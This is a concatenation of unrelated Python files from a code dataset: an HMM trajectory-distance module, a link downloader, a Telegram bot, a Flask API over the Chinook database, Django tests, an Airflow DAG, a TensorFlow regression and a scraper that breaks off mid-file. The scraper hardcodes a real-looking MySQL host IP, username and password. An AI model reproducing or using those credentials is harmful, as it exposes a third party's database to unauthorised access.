tmp\n\nprint(f'Number of words on the page and its neighbouring links: {len(words)}')\n","sub_path":"2.OOP_in_Python/Practice_WEB_and_Dictionaries/someone/WikiParser/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"53194834","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nImplementing the distance definition from the paper: \r\nPorikli F. Trajectory distance metric using hidden markov model based representation. 
ECCVw, PETS 2004.\r\n@author: Cong\r\n\"\"\"\r\n\r\n\r\nimport numpy as np\r\nfrom scipy.cluster.vq import kmeans, vq\r\n\r\nclass Hmm(object):\r\n    __slots__ = ['N','M', 'init', 'trans', 'mix']\r\n    \r\n    def __init__(self):\r\n        self.N = None\r\n        self.M = None\r\n        self.init = None\r\n        self.trans = None\r\n        self.mix = None\r\n    \r\n    def printself(self):\r\n        print (self.trans)\r\n        print (self.mix[0].weight)\r\n    \r\nclass Mix(object):\r\n    __slots__ = ['M', 'mean', 'var', 'weight']\r\n    def __init__(self):\r\n        self.M = None\r\n        self.mean = None\r\n        self.var = None\r\n        self.weight = None\r\n    \r\nclass Param(object):\r\n    __slots__ = ['c','alpha','beta','ksai','gama']\r\n    def __init__(self):\r\n        self.c = None\r\n        self.alpha = None\r\n        self.beta = None\r\n        self.ksai = None\r\n        self.gama = None\r\n    \r\n    \r\ndef train(OneClass, M):\r\n    \r\n    hmm = inithmm(OneClass, M)\r\n    \r\n    pout = []\r\n    for loop in range(0, 100):\r\n        \r\n        hmm = baum(hmm, OneClass)\r\n        \r\n        # total output prob\r\n        temp = 0\r\n        for k in range(len(OneClass)):\r\n            prob = viterbi(hmm, OneClass[k])[0]\r\n            temp = temp + prob\r\n        #print ('total output prob (log) = ', temp)\r\n        pout.append(temp)\r\n        \r\n        # compare distances between two HMMs\r\n        if loop>0:\r\n            if abs((pout[loop]-pout[loop-1])/pout[loop]) < 5e-6:\r\n                #print ('Converged!')\r\n                return hmm\r\n    \r\n    #print ('Exit when it does not converge after 100 loops.')\r\n    \r\n    return hmm\r\n\r\n\r\ndef inithmm(samples, M):\r\n    hmm = Hmm()\r\n    N = len(M) # state num\r\n    hmm.N = N # hmm state num\r\n    hmm.M = M # Gaussian num in each state\r\n    \r\n    # initial probability matrix\r\n    hmm.init = np.zeros((N,1)) \r\n    hmm.init[0] = 1\r\n    \r\n    # trans prob mat\r\n    hmm.trans = np.zeros((N,N))\r\n    for i in range(N-1):\r\n        hmm.trans[i][i] = 0.5\r\n        hmm.trans[i][i+1] = 0.5\r\n    hmm.trans[N-1,N-1] = 1\r\n    \r\n    # initial clustering of pdf\r\n    # average segment\r\n    seg_ind = []\r\n    for k in range(len(samples)):\r\n        T = len(samples[k]) # must be T >= 2*N\r\n        seg_ind.append(np.r_[np.arange(0, T, np.round(T/N)), T].astype(int))\r\n    \r\n    # Kmeans cluster the vectors in each state and get a continuous mixed normal dist\r\n    hmm.mix = []\r\n    for i in range(N):\r\n        # combine the vectors in the same cluster and state\r\n        vector = np.zeros((0, samples[0].shape[1]))\r\n        # gather all the sample features of each state in the same model to a new feature matrix\r\n        for k in range(len(samples)):\r\n            seg1 = seg_ind[k][i] # seg i start\r\n            seg2 = seg_ind[k][i+1] # seg i+1 end\r\n            vector = np.vstack((vector, samples[k][seg1:seg2, :]))\r\n        mix = getmix(vector, M[i])\r\n        hmm.mix.append(mix)\r\n    \r\n    return hmm\r\n\r\n\r\ndef getmix(vector, M):\r\n    \r\n    # K-means to M clusters\r\n    mean = kmeans(vector, M)[0]\r\n    nn = vq(vector, mean)[0]\r\n    \r\n    # only keep the items on the diagonal\r\n    var = np.zeros((M, vector.shape[1]))\r\n    for j in range(0,M):\r\n        ind = (j==nn)\r\n        tmp = vector[ind,:]\r\n        var[j,] = np.std(tmp, axis=0, ddof=1)\r\n\r\n    # normalize the sample numbers as weights\r\n    weight = np.zeros((M, 1))\r\n    for j in range(0,M):\r\n        weight[j] = np.sum((j == nn))\r\n    weight = weight / np.sum(weight)\r\n    \r\n    mix = Mix()\r\n    mix.M = M\r\n    mix.mean = mean\r\n    mix.var = var ** 2\r\n    mix.weight = weight\r\n    return mix\r\n    \r\n\r\n# Baum-Welch\r\ndef baum(hmm, samples):\r\n    mix = hmm.mix\r\n    N = len(mix)\r\n    K = len(samples)\r\n    \r\n    SIZE = samples[0].shape[1]\r\n    \r\n    #compute forward and backward prob matrices. 
note the multi-observation seqs and underflow issues\r\n    #print ('Computing sample parameters...')\r\n    Allparam = []\r\n    for k in range(1,K+1):\r\n        #print (k,end=' ')\r\n        param = getparam(hmm, samples[k-1])\r\n        Allparam.append(param)\r\n    #print (\"\\n\")\r\n    \r\n    # re-estimate the trans prob matrix A: trans\r\n    #print ('\\nRe-estimating the trans prob matrix A...')\r\n    for i in range(1,N):\r\n        denom = 0\r\n        for k in range(1,K+1):\r\n            tmp = Allparam[k-1].ksai[:,i-1,:]\r\n            denom = denom + sum(tmp.flatten())\r\n        for j in range(i,i+2):\r\n            nom = 0\r\n            for k in range(1,K+1):\r\n                tmp = Allparam[k-1].ksai[:,i-1,j-1] \r\n                nom = nom + sum(tmp.flatten())\r\n            hmm.trans[i-1,j-1] = nom / denom\r\n    \r\n    # re-estimate the parameters of the Gaussian mixture\r\n    #print ('Re-estimating Gaussian mixture model parameters...')\r\n    for l in range(1,N+1):\r\n        for j in range(1,hmm.M[l-1]+1):\r\n            #print (l,j,end=' ')\r\n            # compute the mean and var of each pdf\r\n            nommean = np.zeros((1,SIZE))\r\n            nomvar = np.zeros((1,SIZE))\r\n            denom = 0\r\n            for k in range(1,K+1):\r\n                T = samples[k-1].shape[0]\r\n                for t in range(1,T+1):\r\n                    x = samples[k-1][t-1,]\r\n                    nommean = nommean + Allparam[k-1].gama[t-1,l-1,j-1] * x\r\n                    nomvar = nomvar + Allparam[k-1].gama[t-1,l-1,j-1] * (x-mix[l-1].mean[j-1,])**2\r\n                    denom = denom + Allparam[k-1].gama[t-1,l-1,j-1]\r\n            hmm.mix[l-1].mean[j-1,] = nommean / denom\r\n            hmm.mix[l-1].var[j-1,] = nomvar / denom\r\n            \r\n            # compute the weight of each pdf\r\n            nom = 0\r\n            denom = 0\r\n            for k in range(1,K+1):\r\n                tmp = Allparam[k-1].gama[:,l-1,j-1]\r\n                nom = nom + sum(tmp.flatten())\r\n                tmp = Allparam[k-1].gama[:,l-1,]\r\n                denom = denom + sum(tmp.flatten())\r\n            hmm.mix[l-1].weight[j-1] = nom/denom\r\n    #print ('\\n')\r\n    return hmm\r\n    \r\n    \r\ndef getparam(hmm, O):\r\n    # given output seq O, compute forward prob alpha, backward prob beta, parameter c, ksai, and gama\r\n    # Inputs:\r\n    # hmm -- HMM model params\r\n    # O -- n*d observation seq\r\n    # Output:\r\n    # param -- params\r\n    T = O.shape[0] # seq length (rows), actually frame number\r\n    \r\n    init = hmm.init # initial prob\r\n    trans = hmm.trans\t# trans prob\r\n    mix = hmm.mix\t # Gaussian mixture\r\n    N = hmm.N \t # HMM state num\r\n    \r\n    # given observation seq O, compute the forward prob alpha\r\n    alpha = np.zeros((T,N)) # T is frame number\r\n    # first frame\r\n    x = O[0,]\r\n    for i in range(1,N+1):\r\n        alpha[0,i-1] = init[i-1].dot(mixture(mix[i-1],x))\r\n    # forward prob at t = 1\r\n    c = np.zeros((T,1))\r\n    c[0] = 1/sum(alpha[0,])\r\n    alpha[0,] = c[0]*(alpha[0,])\r\n    #print alpha[0]\r\n    # forward prob at t=2:T\r\n    for t in range(2,T+1):\r\n        for i in range(1,N+1):\r\n            temp = 0\r\n            for j in range(1,N+1):\r\n                temp = temp + alpha[t-2,j-1] * trans[j-1,i-1]\r\n            alpha[t-1,i-1] = temp * mixture(mix[i-1],O[t-1,])\r\n        c[t-1]= 1/sum(alpha[t-1,])\r\n        alpha[t-1,] = c[t-1] * alpha[t-1,]\r\n    \r\n    # given observation seq O, compute the backward prob beta\r\n    beta = np.zeros((T,N)) \r\n    # backward prob at t=T\r\n    for l in range(1,N+1):\r\n        beta[T-1,l-1] = c[T-1] \r\n    # backward probs at t=T-1:1\r\n    for t in range(T-1,0,-1):\r\n        x = O[t,]\r\n        for i in range(1,N+1):\r\n            for j in range(1,N+1):\r\n                beta[t-1,i-1] = beta[t-1,i-1] + (beta[t,j-1]) * mixture(mix[j-1],x) * (trans[i-1,j-1])\r\n        \r\n        if c[t-1] < 1.0:\r\n            beta[t-1,] = c[t-1] * beta[t-1,] # original computation\r\n        else:\r\n            overjudge = np.finfo(np.float64).max / c[t-1] # in case of overflow\r\n            if overjudge < np.max(beta[t-1,]):\r\n                #print (c[t-1])\r\n                overidx = beta[t-1,] > (overjudge)\r\n                beta[t-1,][overidx] = 
np.finfo(np.float64).max\r\n                beta[t-1,][np.bitwise_not(overidx)] = c[t-1] * beta[t-1,][np.bitwise_not(overidx)]\r\n            else:\r\n                beta[t-1,] = c[t-1] * beta[t-1,] # original computation\r\n    \r\n    # ksai\r\n    ksai = np.zeros((T-1,N,N))\r\n    for t in range(1,T):\r\n        denom = sum(alpha[t-1,]*beta[t-1,])\r\n        for i in range(1,N):\r\n            for j in range(i, i+2):\r\n                nom = alpha[t-1,i-1] * trans[i-1,j-1] * mixture(mix[j-1],O[t,]) * beta[t,j-1]\r\n                ksai[t-1,i-1,j-1] = c[t-1] * nom/denom\r\n    \r\n    # mixture output prob: gama\r\n    gama = np.zeros((T,N,max(hmm.M)))\r\n    for t in range(1,T+1):\r\n        pab = np.zeros((N,1))\r\n        for l in range(1,N+1):\r\n            pab[l-1] = alpha[t-1,l-1] * beta[t-1,l-1]\r\n        x = O[t-1,]\r\n        for l in range(1,N+1):\r\n            prob = np.zeros((mix[l-1].M,1))\r\n            for j in range(1,mix[l-1].M+1):\r\n                m = mix[l-1].mean[j-1,]\r\n                v = mix[l-1].var[j-1,]\r\n                prob[j-1] = mix[l-1].weight[j-1] * pdf(m, v, x)\r\n            tmp = pab[l-1]/sum(pab)\r\n            for j in range(1,mix[l-1].M+1):\r\n                gama[t-1,l-1,j-1] = tmp.dot(prob[j-1])/sum(prob)\r\n    \r\n    param = Param()\r\n    param.c = c\r\n    param.alpha = alpha\r\n    param.beta = beta\r\n    param.ksai = ksai\r\n    param.gama = gama\r\n    \r\n    return param\r\n    \r\n\r\ndef mixture(mix, x):\r\n    # compute the output prob of an observation vector x at an HMM state\r\n    # Input:\r\n    # mix -- Gaussian mixture\r\n    # x -- input vector, SIZE*1\r\n    # Output:\r\n    # prob -- output prob\r\n    M = mix.M\r\n    prob = 0.0\r\n    for j in range(1,M + 1):\r\n        m = mix.mean[j-1,]\r\n        v = mix.var[j-1,]\r\n        w = mix.weight[j-1]\r\n        prob = prob + w * pdf(m, v, x)\r\n    \r\n    return prob\r\n    \r\n\r\ndef pdf(m, v, x):\r\n    # single Gaussian prob density function (p.d.f.)\r\n    #Input:\r\n    #m -- mean vector, SIZE*1\r\n    #v -- var vector, SIZE*1\r\n    #x -- input vector, SIZE*1\r\n    #Output:\r\n    #p -- output prob\r\n    eps = np.finfo(np.float64).tiny\r\n    if v.min() < eps or np.prod(v) < eps:\r\n        return 1.0 # in case of ZeroDivisionError\r\n    p = (2 * np.pi * np.prod(v)) ** -0.5 * np.exp(-0.5 * ((x-m)/v).dot((x-m).T))\r\n    if p < eps:\r\n        p = eps # in case of underflow\r\n    return p \r\n    \r\n\r\ndef viterbi(hmm, O):\r\n    # Viterbi algorithm\r\n    # given output seq O, compute the forward prob delta and backtracking matrix fai\r\n    #Input:\r\n    # hmm -- hmm model\r\n    # O -- input observation seq, N*D, D is the dim of vector\r\n    #Output:\r\n    # prob -- output prob\r\n    # q -- state seq\r\n    init = hmm.init.copy()\r\n    trans = hmm.trans.copy()\r\n    mix = hmm.mix\t # Gaussian mixture\r\n    N = hmm.N\t # HMM state num\r\n    T = O.shape[0]\r\n    \r\n    # compute log(init)\r\n    ind1 = (init>0).nonzero()[0]\r\n    ind0 = (init<=0).nonzero()[0]\r\n    init[ind0] = -np.inf\r\n    init[ind1] = np.log(init[ind1])\r\n    \r\n    # compute log(trans)\r\n    ind1 = (trans>0).nonzero()\r\n    ind0 = (trans<=0).nonzero()\r\n    trans[ind0] = -np.inf\r\n    trans[ind1] = np.log(trans[ind1])\r\n    \r\n    # initialization\r\n    delta = np.zeros((T,N))\r\n    fai = np.zeros((T,N))\r\n    q = np.zeros((T,1))\r\n    \r\n    # t=1: Viterbi initialization\r\n    x = O[0,:]\r\n    for i in range(1,N+1):\r\n        delta[0,i-1] = init[i-1]+ np.log(mixture(mix[i-1],x))\r\n    \r\n    # t=2:T: Viterbi iteration\r\n    for t in range(2,T+1):\r\n        for j in range(1,N+1):\r\n            delta[t-1,j-1] = np.max(delta[t-2,] + trans[:,j-1].T)\r\n            fai[t-1,j-1] = np.argmax(delta[t-2,] + trans[:,j-1].T)\r\n            x = O[t-1,:]\r\n            delta[t-1,j-1] = delta[t-1,j-1] + np.log(mixture(mix[j-1],x))\r\n    \r\n    # final prob\r\n    prob = np.max(delta[T-1,:])\r\n    q[T-1] = np.argmax(delta[T-1,:])\r\n\r\n    # best state path\r\n    for t in range(T-1,2,-1):\r\n        q[t-1] = fai[t, 
int(q[t]-1)]\r\n    \r\n    return prob, q\r\n\r\n\r\ndef hmmdist(sample0, sample1, M=np.array([1,1,1,1,1,1])):\r\n    hmm0 = train([sample0], M)\r\n    hmm1 = train([sample1], M)\r\n    prob00 = viterbi(hmm0, sample0)[0]\r\n    prob01 = viterbi(hmm0, sample1)[0]\r\n    prob10 = viterbi(hmm1, sample0)[0]\r\n    prob11 = viterbi(hmm1, sample1)[0]\r\n    #print(prob00, prob01, prob10, prob11)\r\n    dist = prob01 + prob10 - prob00 - prob11\r\n    return np.abs(dist)\r\n\r\n\r\ndef hmmdist_eval(hmm0, hmm1, sample0, sample1):\r\n    prob00 = viterbi(hmm0, sample0)[0]\r\n    prob01 = viterbi(hmm0, sample1)[0]\r\n    prob10 = viterbi(hmm1, sample0)[0]\r\n    prob11 = viterbi(hmm1, sample1)[0]\r\n    #print(prob00, prob01, prob10, prob11)\r\n    dist = prob01 + prob10 - prob00 - prob11\r\n    return np.abs(dist)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    \r\n    M = np.array([1,1,1]) # hmm: 3 states, 1 GMM\r\n    \r\n    print ('Loading data...')\r\n    from datasets import read_cross_dataset#, read_traffic_dataset\r\n    train_set, train_labels, test_set, true_labels = read_cross_dataset()\r\n    sample0 = train_set[20]\r\n    sample1 = train_set[25]\r\n    sample2 = train_set[100]\r\n    \r\n    print ('Training...')\r\n    print(hmmdist(sample0, sample1))\r\n    print(hmmdist(sample1, sample2))\r\n    print(hmmdist(sample1, sample1))\r\n    \r\n#    #save hmm models\r\n#    f = open('myhmm.dat','wb')\r\n#    pickle.dump(hmm1, f, -1)\r\n#    f.close()\r\n    \r\n    print ('Completed')\r\n","sub_path":"Exp2/hmm_dist.py","file_name":"hmm_dist.py","file_ext":"py","file_size_in_byte":13619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"207922037","text":"import re, os, wget\n\npath = 'C:\\\\users\\\\alex\\\\downloads\\\\temp'\n\nwith open('link.txt','r') as f:\n    for line in f:\n        for word in line.split():\n            url = word\n            file_name = wget.download(url, path) \n\nprint(type(word))\n\n\n\n\n\n\n\n\n\n\n\n\n\n'''for line in lines:\n\n\turls = re.findall('http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\\\(\\\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+', line)\n\nprint (urls) '''","sub_path":"tests/getlinks.py","file_name":"getlinks.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"61021250","text":"import logging\n\nfrom aiogram.dispatcher.filters import Command, Text\n\nfrom Bot import config\nfrom aiogram import Bot, Dispatcher, executor, types\nfrom Db.db import SqliteRecipes as db\n\n# set the logging level\nlogging.basicConfig(level=logging.INFO)\n\n# initialize the database\nbd = db()\n\n# initialize the bot\nbot = Bot(token=config.API_TOKEN)\ndp = Dispatcher(bot)\n\nmain_menu = types.ReplyKeyboardMarkup(\n    keyboard=[\n        [\n            types.KeyboardButton(text='Profile'),\n            types.KeyboardButton(text='Search history'),\n        ],\n        [\n            types.KeyboardButton(text='Favorites'),\n            types.KeyboardButton(text='Search'),\n        ],\n    ],\n    resize_keyboard=True\n)\n\nsearch_menu = types.ReplyKeyboardMarkup(\n    keyboard=[\n        [\n            types.KeyboardButton(text='search by ingredients'),\n            types.KeyboardButton(text='search by category'),\n            types.KeyboardButton(text='show all categories'),\n        ],\n        [\n            types.KeyboardButton(text='Back'),\n        ],\n    ],\n    resize_keyboard=True\n)\n\n\n# keyboard\n\n@dp.message_handler(Command(\"start\"))\nasync def show_menu(message: types.Message):\n    await message.answer(f\"Welcome to our bot, {message.from_user.first_name}\\n We will help you find recipes\",\n                         reply_markup=main_menu)\n    bd.add_user(message.from_user.id)\n\n\n@dp.message_handler(Text(equals='Profile'))\nasync def 
get_food(message: types.Message):\n    await message.answer(f\"You selected {message.text}\")\n\n\n@dp.message_handler(Text(equals='Search history'))\nasync def get_food(message: types.Message):\n    await message.answer(f\"You selected {message.text}\")\n\n\n@dp.message_handler(Text(equals='Favorites'))\nasync def get_food(message: types.Message):\n    await message.answer(f\"You selected {message.text}\")\n\n\n@dp.message_handler(Text(equals='Search'))\nasync def get_food(message: types.Message):\n    await message.answer(f\"You selected {message.text}\", reply_markup=search_menu)\n\n\n@dp.message_handler(Text(equals='Back'))\nasync def get_food(message: types.Message):\n    await message.answer(f\"You went back\", reply_markup=main_menu)\n\n\nif __name__ == '__main__':\n    executor.start_polling(dp)\n","sub_path":"Bot/telegram-bot.py","file_name":"telegram-bot.py","file_ext":"py","file_size_in_byte":2503,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"157085437","text":"import numpy as np\n\n# Import Dependencies\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine\nfrom sqlalchemy import func\n\nfrom flask import Flask, jsonify\n\n\n#################################################\n# Database Setup\n#################################################\n# Create an engine for the chinook.sqlite database\nengine = create_engine(\"sqlite:///../Resources/chinook.sqlite\", echo=False)\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nInvoices = Base.classes.invoices\nItems = Base.classes.invoice_items\n\n# Create our session (link) from Python to the DB\nsession = Session(engine)\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n\n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef welcome():\n    \"\"\"List all available api routes.\"\"\"\n    return (\n        f\"Available Routes:<br/>\"\n        f\"/api/countries<br/>\"\n        f\"/api/invoice_total<br/>\"\n        f\"/api/postal_codes_country/<country_name><br/>\"\n        f\"/api/item_totals_country/<country_name><br/>\"\n        f\"/api/item_totals<br/>\"\n        f\"/api/item_totals_all_postal_code/<country_name><br/>\"\n    )\n\n\n@app.route(\"/api/countries\")\ndef countries():\n    \"\"\"Return a list of all billing countries\"\"\"\n    # Query the distinct billing countries\n    results = session.query(Invoices.BillingCountry).group_by(Invoices.BillingCountry).all()\n\n    # Convert list of tuples into normal list\n    all = list(np.ravel(results))\n\n    return jsonify(all)\n\n@app.route(\"/api/invoice_total\")\ndef invoice_total():\n    \"\"\"# Design a query that lists the invoices totals for each billing country \n# and sort the output in descending order.\"\"\"\n    # Query the invoice totals per billing country\n    results = session.query(Invoices.BillingCountry, func.sum(Invoices.Total)).\\\n        group_by(Invoices.BillingCountry).\\\n        order_by(func.sum(Invoices.Total).desc()).all()\n\n    results = [(item[0], float(item[1])) for item in results]\n\n    # Convert list of tuples into normal list\n    invoice = list(np.ravel(results))\n\n    return jsonify(invoice)\n\n@app.route(\"/api/postal_codes_country/<country_name>\")\ndef postal_codes(country_name):\n    \"\"\"# List all of the Billing Postal Codes for the country.\"\"\"\n\n    results = session.query(Invoices.BillingPostalCode).\\\n        filter(Invoices.BillingCountry == country_name).group_by(Invoices.BillingPostalCode).all()\n\n    postal_codes = list(np.ravel(results))\n\n    return jsonify(postal_codes)\n\n\n# @app.route(\"/api/item_totals_country/<country_name>\")\n# def item_totals(country_name):\n#     \"\"\"Calculate the Item Totals (sum(UnitPrice * Quantity)) for the country\"\"\"\n#     results = session.query(func.sum(Items.UnitPrice * Items.Quantity)).\\\n#         filter(Invoices.InvoiceId == Items.InvoiceId).\\\n#         filter(Invoices.BillingCountry == country_name).scalar()\n#     item_totals = list(np.ravel(results))\n\n#     return jsonify(item_totals)\n\n\n# @app.route(\"/api/item_totals_all_postal_code/<country_name>\")\n# def item_totals(country_name):\n#     # Calculate the Item Totals `sum(UnitPrice * Quantity)` for each Billing Postal Code in the country\n#     # Sort the results in descending order by Total\n#     results = session.query(Invoices.BillingPostalCode, func.sum(Items.UnitPrice * Items.Quantity)).\\\n#         filter(Invoices.InvoiceId == Items.InvoiceId).\\\n#         filter(Invoices.BillingCountry == country_name).\\\n#         group_by(Invoices.BillingPostalCode).\\\n#         order_by(func.sum(Items.UnitPrice * Items.Quantity).desc()).all()\n\n#     item_totals_per_code = list(np.ravel(results))\n\n#     return jsonify(item_totals_per_code)\n\n\n\nif __name__ == '__main__':\n    app.run(debug=True)","sub_path":"Flask/Flask_Database and API setup.py","file_name":"Flask_Database and API setup.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"400154410","text":"from datetime import timedelta\n\nimport pytest\n\nfrom backend import settings\nfrom forecasting.models import PlatformUser, Survey\nfrom forecasting.testing.testing_data.recipes import Recipes\n\n\n@pytest.mark.django_db\ndef create_platform_user_for_survey_tests():\n    # Create user from recipe using PlatformUser.create()\n    Recipes.make_platform_user(\n        htpaa_id=1\n    ).create()\n\n    return PlatformUser.objects.filter(htpaa_id=1)[0]\n\n\n@pytest.mark.django_db\ndef test_survey_is_added_to_database_correctly():\n    # Create PlatformUser\n    user = create_platform_user_for_survey_tests()\n\n    # Create WHO-5 survey from recipe using SurveyWHOFive.create()\n    Survey(\n        user=user,\n        answer_one=1,\n        answer_two=2,\n        answer_three=3,\n        answer_four=4,\n        answer_five=5\n    ).create()\n\n    # Fetch from db filtering on user and answers\n    survey_from_db = Survey.objects.get(user__pk=user.pk)\n\n    
# Assert fetched object has pk and correct information\n assert survey_from_db.survey_type == 1\n assert survey_from_db.answers == [1, 2, 3, 4, 5]\n\n\n@pytest.mark.django_db\ndef test_survey_scores_are_evaluated_correctly():\n # Create PlatformUser\n user = create_platform_user_for_survey_tests()\n\n # Create WHO-5 survey from recipe using SurveyWHOFive.create()\n Survey(\n user=user,\n answer_one=1,\n answer_two=1,\n answer_three=1,\n answer_four=1,\n answer_five=1\n ).create()\n\n # Fetch survey from db\n survey_from_db = Survey.objects.get(user__pk=user.pk)\n\n # assert calculated values\n assert survey_from_db.raw_score == 5\n assert survey_from_db.total_score == 20\n\n\n@pytest.mark.django_db\ndef test_survey_risk_levels_are_set_correctly():\n # Create PlatformUser\n user = create_platform_user_for_survey_tests()\n\n # Create WHO-5 surveys from recipe using SurveyWHOFive.create()\n Survey(\n user=user,\n answer_one=1,\n answer_two=1,\n answer_three=1,\n answer_four=1,\n answer_five=1\n ).create()\n\n Survey(\n user=user,\n answer_one=2,\n answer_two=2,\n answer_three=2,\n answer_four=2,\n answer_five=2\n ).create()\n\n Survey(\n user=user,\n answer_one=3,\n answer_two=3,\n answer_three=3,\n answer_four=3,\n answer_five=3\n ).create()\n\n # Fetch survey queryset from db\n surveys_from_db = Survey.objects.all()\n\n # Assert calculated flags\n assert surveys_from_db[0].risk_level == 3\n assert surveys_from_db[1].risk_level == 2\n assert surveys_from_db[2].risk_level == 1\n\n\n@pytest.mark.django_db\ndef test_subtract_days_only_works_in_debug_mode():\n # Assert DEBUG mode is True\n assert settings.DEBUG is True\n # Set DEBUG mode to False\n settings.DEBUG = False\n # Assert DEBUG mode is False\n assert settings.DEBUG is False\n # Create PlatformUser\n user = create_platform_user_for_survey_tests()\n # Create Survey\n Survey(\n user=user,\n answer_one=1,\n answer_two=1,\n answer_three=1,\n answer_four=1,\n answer_five=1\n ).create()\n # Fetch Survey from DB\n survey_from_db = Survey.objects.get(user__pk=user.pk)\n # Assert Survey.subtract_days_from_datetime returns False\n assert survey_from_db.subtract_days_from_datetime(1) is False\n # Set DEBUG mode to True\n settings.DEBUG = True\n\n\n@pytest.mark.django_db\ndef test_subtract_days_correctly_subtracts_days():\n # Create PlatformUser\n user = create_platform_user_for_survey_tests()\n # Create Survey\n Survey(\n user=user,\n answer_one=1,\n answer_two=1,\n answer_three=1,\n answer_four=1,\n answer_five=1\n ).create()\n # Fetch Survey from DB\n survey_from_db = Survey.objects.get(user__pk=user.pk)\n # Set old datetime\n old_datetime = survey_from_db.datetime\n # Subtract day from survey datetime\n survey_from_db.subtract_days_from_datetime(1)\n # Set new datetime\n new_datetime = survey_from_db.datetime\n # Assert new datetime days is one less than old datetime days\n assert old_datetime - timedelta(days=+1) == new_datetime\n\n\n\n\n\n","sub_path":"backend/forecasting/testing/test_models/test_survey.py","file_name":"test_survey.py","file_ext":"py","file_size_in_byte":4174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"49873955","text":"from airflow.operators import BashOperator\nfrom airflow.models import DAG\nfrom datetime import datetime, timedelta\n\ndefault_args = {\n 'owner': 'airflow',\n 'start_date': datetime.now() - timedelta(minutes=1),\n 'email': [],\n 'email_on_failure': False,\n 'email_on_retry': False,\n 'retries': 1,\n 'retry_delay': timedelta(minutes=5),\n}\n\ndag = 
DAG('airflow_practical_exercise', default_args=default_args, schedule_interval=None, start_date=datetime.now() - timedelta(minutes=1))\n\n\n\n\nMysqlToHive = BashOperator(\n    task_id='MysqlToHive',\n    bash_command=\"\"\" sh /home/cloudera/Documents/PracticalExercise2/MysqlToHive.sh \"\"\",\n    dag=dag)\n    \ncsvToHive = BashOperator(\n    task_id='csvToHive',\n    bash_command=\"\"\" sh /home/cloudera/Documents/PracticalExercise2/csvToHive.sh \"\"\",\n    dag=dag)\n\nReportingTables1= BashOperator(\n    task_id='ReportingTables1',\n    bash_command=\"\"\" sh /home/cloudera/Documents/PracticalExercise2/ReportingTables1.sh \"\"\",\n    dag=dag)\n\nReportingTables2= BashOperator(\n    task_id='ReportingTables2',\n    bash_command=\"\"\" sh /home/cloudera/Documents/PracticalExercise2/ReportingTables2.sh \"\"\",\n    dag=dag)\n\n\n\n\nMysqlToHive.set_downstream(ReportingTables1)\ncsvToHive.set_downstream(ReportingTables1)\nMysqlToHive.set_downstream(ReportingTables2)\n\n","sub_path":"Exercise2/airflow_practical_exercise.py","file_name":"airflow_practical_exercise.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"497791916","text":"# Finds how basketball scoring is done from inputs of:\n# Minutes played, field goals made, field goal attempts, 3 point baskets made,\n# 3 point attempts, free throws made and free throw attempts.\nimport tensorflow as tf\nimport pandas as pd\nimport numpy as np\nfrom tensorflow import keras\n\n# Make numpy values easier to read.\nnp.set_printoptions(precision=3, suppress=True)\n\ngamelog = pd.read_csv(\"data/lebron_gamelog.csv\")\ngamelog.head()\nprint(gamelog)\n\ngamelog_features = gamelog.copy()\npoints = gamelog_features.pop('PTS')\ngamelog_features.pop('Player')\ngamelog_features.pop('Date')\ngamelog_features.pop('FDP')\ngamelog_features.pop('DKP')\n\nprint(gamelog_features)\nprint(points)\n\nmodel = tf.keras.Sequential([keras.layers.Dense(units=1, input_shape=[18])])\nmodel.compile(optimizer=keras.optimizers.Adam(1.0), loss='mean_squared_error')\n\nmodel.fit(gamelog_features, points, epochs=500)\nprint('weights:', model.weights)\n# Predict the points scored for one sample game stat line (18 features)\nprint(model.predict([[46.8, 9.0, 28.0, 0.0, 7.0, 6.0, 10.0, 6.0, 10.0, 16.0, 9.0, 2.0, 0.0, 3.0, 0.0, -3.0, 1, 0]]))","sub_path":"src/main/python/ml/total_points_csv.py","file_name":"total_points_csv.py","file_ext":"py","file_size_in_byte":1065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"38241710","text":"import datetime\nimport random\nimport urllib.request\n\nimport pymysql\n\nUSER_AGENTS_FILE = 'user_agents.txt'\n\n\ndef connect_bd(baza):\n    con = pymysql.connect(host=\"86.57.133.250\", port=3306, user=\"parser\", passwd=\"Dft56Point\", db=baza, charset='utf8',\n                          init_command='SET NAMES UTF8', cursorclass=pymysql.cursors.DictCursor, autocommit=True)\n    return con\n\n\ndef LoadUserAgents(uafile=USER_AGENTS_FILE):\n    uas = []\n    with open(uafile, 'rb') as uaf:\n        for ua in uaf.readlines():\n            if ua:\n                uas.append(ua.strip()[1:-1 - 1])\n    random.shuffle(uas)\n    return uas\n\n\ndef main():\n    dt = datetime.datetime.now()\n    dt = str(dt).split(' ')[0]\n    connect = connect_bd(\"tenders_test\")\n    cur = connect.cursor()\n    cur.execute(\n        \"\"\"SELECT url, file_name FROM attachment AS att LEFT JOIN tender AS t ON att.id_tender= t.id_tender \n        WHERE t.end_date > %s AND t.cancel = 0\"\"\", (dt,))\n    res_att = cur.fetchall()\n    count = 0\n    user_agents = LoadUserAgents()\n    for r in res_att:\n        try:\n            ua = 
